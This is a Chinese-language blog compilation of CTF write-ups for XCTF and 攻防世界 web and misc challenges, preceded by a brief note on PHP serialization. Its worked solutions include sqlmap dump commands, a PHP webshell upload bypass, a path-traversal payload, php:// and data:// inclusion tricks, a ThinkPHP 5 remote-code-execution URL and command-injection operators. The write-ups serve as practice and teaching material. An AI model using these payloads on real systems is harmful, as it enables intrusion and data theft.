序列化和反序列化在PHP中用得不算多，在Java语言中用得比较多。其实你有没有发现，这种把一个对象或者数组的变量转化成字符串的方式，json也可以做到。

使用json来实现对象和字符串之间的转换，在PHP中显得更加直观和轻便。而且经过测试，使用json_encode()比serialize()方法更加快速，大概快2~3倍。

在我看来，序列化和反序列化是一种传输抽象数据的思想。通过定义序列化和反序列化的规则，我们可以实现将PHP中的对象序列化成字节流，然后传输给别的语言或者系统使用，这在远程调用里面非常的方便。

注:转自 悠悠i

NaNNaNNaNNaN-Batman

注:本周的题是这道题的小改动，先说原题

打开后<script>开头，是一个JS文件，保存后缀名为html打开

是一个搜索框，输入字符无反应，回去看源码

在末尾有eval()函数，eval（string）的作用是，计算某个字符串，并执行里面的js代码，比如

var msg = "hello world";
eval("alert(msg)"); //"hello world"

程序是乱码读不出来，又可以被正确执行。那我们可以通过alert把执行的函数弹窗出来，这样就能够显示出正常的程序，再修正一下格式。

加上了<script>标签，好让vscode自动修正格式。

<script>
    function $() {
        var e = document.getElementById("c").value;
        if (e.length == 0)
            if (e.match(/^be0f23/) != null)
                if (e.match(/233ac/) != null)
                    if (e.match(/e98aa$/) != null)
                        if (e.match(/c7be9/) != null) {
                            var t = ["fl", "s_a", "i", "e}"];
                            var n = ["a", "_h0l", "n"];
                            var r = ["g{", "e", "_0"];
                            var i = ["it'", "_", "n"];
                            var s = [t, n, r, i];
                            for (var o = 0; o < 13; ++o) {
                                document.write(s[o % 4][0]);
                                s[o % 4].splice(0, 1)
                            }
                        }
    }
    document.write('<input id="c"><button onclick=$()>Ok</button>'); delete _
</script>

上来是一个函数，最后这句话输入函数参数

document.write('<input id="c"><button onclick=$()>Ok</button>'); 

函数里面，首先判断长度是不是16（本周题改成0了），再有多个if嵌套，比较输入是否包含这些字符串，最后输出flag。

把字符串拼起来输入

^表示匹配开始字段，$表示匹配结束字段，所以构造满足条件的字符串即可。

be0f233ac7be98aa

得到flag{it’s_a_h0le_in_0ne}

直接截取得到flag的代码运行

把这段直接放到console里运行，得到flag。

第二道MISC请见：

CTF解密MISC（二）

sqlmap使用的指令，如何进行sql注入

列出数据库的信息

-u http://159.138.137.79:50870/ –data “search=df” -dbs

可以看到这个数据库里面有两个表

列出某个表

-u http://159.138.137.79:50870/ –data “search=df” -D news –tables

查看表信息

-u http://159.138.137.79:50870/ –data “search=df” -T secret_table –dump

还会继续补充—–

文件上传和爆破题，来自XCTF

upload1

打开网页

上传一个试试

只让传图片，去看看源码

<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript">
Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}
}
</script>
</head>
<body>
<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> 
<input  id="upfile" name='upfile' type='file' onchange="check();" /> 

<input type='submit'  id ='submit' value='上传'> 
</form> 
</body>
</html>

只可以上传jpg和png格式

可以在上传时更改文件名后缀，比如用brupsuit改包

先上传jpg后缀的一句话木马

再改成php

上传成功

蚁剑连接找到flag

还有一种方式，可以在前端更改，把上传按钮的disable去掉就可以了

ics-06

云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。

打开网页

题目提示去报表中心

发现了一个变量，用brupsuit爆破试试

变量已经选好了

类型选择数字，范围选择的是1-9999

线程500

找到了一个响应包不同的值

访问即可拿到flag

CTFweb题解两道，题目来自攻防世界

warmup （代码审计）

临时网址：

http://111.198.29.45:42917/

打开发现滑稽

藏在页面里了，打开source.php

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

两个白名单，source.php和hint.php，打开hint.php

flag不在这，回到hint.php审计代码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)  //传入page参数
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {   //page为空或者不是字符串
                echo "you can't see it";
                return false;         
            }

            if (in_array($page, $whitelist)) {  // page在白名单里
                return true;                        
            }                                

            $_page = mb_substr(
                $page,                          //截取到第一个问号，如果没有问号则不截取
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page); //解码
            $_page = mb_substr(         //解码后截取
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {  //这种方式可以获得flag
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

可以使用最后一个if获得flag，通过把?二次编码，在服务器端提取参数时解码一次，在checkfile中解码一次。之后再在上级目录中找ffffllllaaaagggg。

http://111.198.29.45:51775/source.php?file=source.php%253f../../../../../ffffllllaaaagggg

得到flag

flag{25e7bce6005c4e0c983fb97297ac6e5a}

Web_php_include

这个题有两种解法，先来一种暴力的，直接扫

一句话木马

数据库在这，空密码直接进

然后一句话木马

答案在这里

伪协议

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是，则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串；否则，返回NULL。

这个直接把php://替换了，大小写绕过即可

使用brupsuit连接

有flag文件

cat打开文件

也可以使用page=data:text/plain,<?php system(“ls”); ?>

同样可以拿到flag

CTFweb writeup 每日更新，php_rce

1.php_rce

额，这个之前没见过。后来了解到Thinkphp 5 有漏洞 漏洞介绍

http://IP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=指令

比如执行，查找flag文件

http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "*flag"

显示 /flag /flag

直接打开flag文件

http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到 flag{thinkphp5_rce} 

这个题有特殊性吧，不知道漏洞是解不出来。积累一下。

第二道题遇到了点问题，随后会更新。

web类题目writeup第三天，题目来源XCTF。每日更新两道。

1.baby_web 想想初始页面是哪个

初始页面index.php。每个网站都会有这个文件，刚部署好环境自动创建的，index有索引的意思。

手动进入index.php，在控制台查看文件内容

找到flag，这题也是很baby了

2. Training-WWW-Robots

看这个题目，绝对是robots.txt，进入页面弹出这段话

In this little training challenge, you are going to learn about the Robots_exclusion_standard.
The robots.txt file is used by web crawlers to check if they are allowed to crawl and index your website or only parts of it.
Sometimes these files reveal the directory structure instead protecting the content from being crawled.

Enjoy!

直接进入

就是你了！！

完事，明天继续更新。

本篇还是CTFweb刷题的记录，来自xctf。每天更新两道~

1.小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的，你知道为什么吗。

打开网址出现输入框，看看能不能带一个其它命令进去

命令执行

• command1 && command2 先执行 command1，如果为真，再执行 command2
• command1 | command2   只执行 command2
• command1 & command2   先执行 command2 后执行 command1
• command1 || command2  先执行 command1，如果为假，再执行 command2

带入find /  -name  ” flag*”   ，看看有没有flag

果然有，那就直接打开，应该就可以得到flag了

2.小宁发现了一个网页，但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )

打开网页

输入密码返回错误，在这里是找不到什么了，看看源码

<html>
<head>
    <title>JS</title>
    <script type="text/javascript">
    function dechiffre(pass_enc){
        var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
        var tab  = pass_enc.split(',');
                var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;
                        k = j + (l) + (n=0);
                        n = tab2.length;
                        for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));
                                if(i == 5)break;}
                        for(i = (o=0); i < (k = j = n); i++ ){
                        o = tab[i-l];
                                if(i > 5 && i < k-1)
                                        p += String.fromCharCode((o = tab2[i]));
                        }
        p += String.fromCharCode(tab2[17]);
        pass = p;return pass;
    }
    String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

    h = window.prompt('Enter password');
    alert( dechiffre(h) );

</script>
</head>

</html>

阅读代码，发现输入任何值都会输出pass转化成的字符串，下面有个奇怪的String，怀疑密码就在这里。首先把这段16进制密文转换为10进制(base16 \x只是分隔符)。

应该是ASC2码值，转化成字符串

得到 Cyberpeace{786OsErtk12}

明天继续更新！